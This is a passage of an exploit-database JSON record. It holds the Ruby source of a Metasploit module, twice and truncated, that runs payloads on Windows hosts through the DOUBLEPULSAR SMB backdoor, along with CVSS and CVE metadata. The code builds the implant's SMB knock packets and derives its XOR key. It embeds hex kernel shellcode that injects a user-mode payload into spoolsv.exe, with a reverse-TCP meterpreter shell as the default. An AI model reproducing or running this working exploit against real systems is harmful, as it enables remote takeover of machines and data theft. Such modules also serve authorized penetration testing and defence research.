'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-04] #"}, "lastseen": "2021-11-03T22:14:11", "differentElements": ["sourceData"], "edition": 65}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e9d1f56255a7764f4ebc7af5c0d726fe", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-04T22:17:15", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-04T22:17:15", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-04T22:17:15", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if 